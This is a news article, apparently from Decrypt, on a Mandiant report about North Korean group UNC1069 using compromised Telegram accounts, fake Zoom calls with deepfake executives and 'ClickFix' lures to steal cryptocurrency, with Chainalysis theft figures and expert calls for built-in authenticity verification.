Introduction
North Korean state-linked hackers are deploying AI-generated deepfake videos in sophisticated phishing attacks that have pilfered over $2 billion from the cryptocurrency industry in 2025 alone. A new report from Google’s Mandiant security team details how threat actors are exploiting trust in routine digital communications—like video calls and calendar invites—to execute highly targeted intrusions, signaling a dangerous evolution in cybercrime where digital identity itself has become the primary vulnerability.
Key Points
- Attackers use compromised Telegram accounts and fake Zoom meetings with AI-generated deepfake videos of crypto executives to build trust before deploying malware.
- North Korean hackers stole $2.02 billion in cryptocurrency in 2025 through fewer but more targeted attacks, bringing their total theft to approximately $6.75 billion.
- Security experts warn that AI is now used to draft messages, correct tone, and mirror communication styles, making impersonation harder to detect and potentially scalable through automated systems.
The Anatomy of a Deepfake Heist
The attack chain, attributed with high confidence to the North Korean threat actor UNC1069—also known as CryptoCore—begins not with a technical exploit, but with social engineering. According to Mandiant’s investigation, hackers first compromise the Telegram account of a known cryptocurrency executive. Using this trusted identity, they contact a target within a crypto firm, venture capital fund, or software developer company to build rapport. The interaction culminates in a Calendly link for a 30-minute meeting, which directs the victim to a spoofed Zoom call hosted on the attackers’ own infrastructure.
During the fake meeting, the critical deception occurs: the victim reports seeing a deepfake video of a well-known crypto CEO. “The effectiveness of this approach comes from how little has to look unusual,” said Fraser Edwards, CEO of decentralized identity firm cheqd. “The sender is familiar. The meeting format is routine.” Attackers then claim audio problems and instruct the victim to run “troubleshooting” commands—a technique known as “ClickFix”—which triggers a malware infection. Forensic analysis revealed seven distinct malware families deployed to harvest credentials, browser data, and session tokens for immediate financial theft and future impersonation.
Fewer Attacks, Larger Thefts: A Strategic Shift
This sophisticated, trust-based strategy is yielding staggering financial returns for the Democratic People’s Republic of Korea (DPRK). Data from blockchain analytics firm Chainalysis reveals that North Korean hackers stole $2.02 billion in cryptocurrency in 2025, marking a 51% increase from the previous year. Remarkably, this surge in value stolen occurred even as the total number of attacks declined. The cumulative haul for DPRK-linked actors now stands at approximately $6.75 billion.
These figures underscore a profound strategic shift. State-linked cybercriminals are moving away from broad, scattergun phishing campaigns. Instead, groups like CryptoCore are investing in fewer, highly tailored operations that exploit the inherent trust in everyday digital workflows. By weaponizing calendar invites and video conferences—tools synonymous with legitimate business—they achieve a higher success rate per incident, resulting in larger aggregate thefts through more efficient targeting.
AI Escalates the Impersonation Threat Beyond Video
The use of AI-generated deepfake video represents a significant escalation, but experts warn the technology’s role is expanding. “Deepfake video is typically introduced at escalation points, such as live calls, where seeing a familiar face can override doubts,” Edwards explained. The goal is not a prolonged conversation but just enough realism to persuade the victim to take the next malicious step.
However, AI’s supporting role in these campaigns is equally concerning. Edwards notes that artificial intelligence is now routinely used to draft convincing messages, correct the tone of voice, and mirror an individual’s typical communication style with colleagues. This makes routine messages far harder to question and reduces the likelihood a recipient will pause to verify the interaction’s authenticity. The risk is poised to grow exponentially as AI agents become integrated into everyday communication. “If those systems are abused or compromised, deepfake audio or video can be deployed automatically, turning impersonation from a manual effort into a scalable process,” Edwards warned.
Systemic Defenses, Not User Vigilance, Are Required
The consensus among security professionals is that the human element—the trust placed in digital identities—has become the weakest link, and traditional defenses are inadequate. It is “unrealistic” to expect users to reliably spot advanced deepfakes or meticulously scrutinize every routine meeting request. “The answer is not asking users to pay closer attention, but building systems that protect them by default,” Edwards asserted.
The solution, therefore, lies in systemic change. Experts argue for improving how authenticity is signaled and verified across digital platforms, enabling users to instantly discern whether content is real, synthetic, or unverified without relying on instinct or manual investigation. As North Korean actors like UNC1069 continue to refine their AI-powered schemes, the cryptocurrency industry and the broader fintech sector face a pressing need to move beyond reactive security and embed verification and trust into the very architecture of digital communication.
📎 Related coverage from: decrypt.co
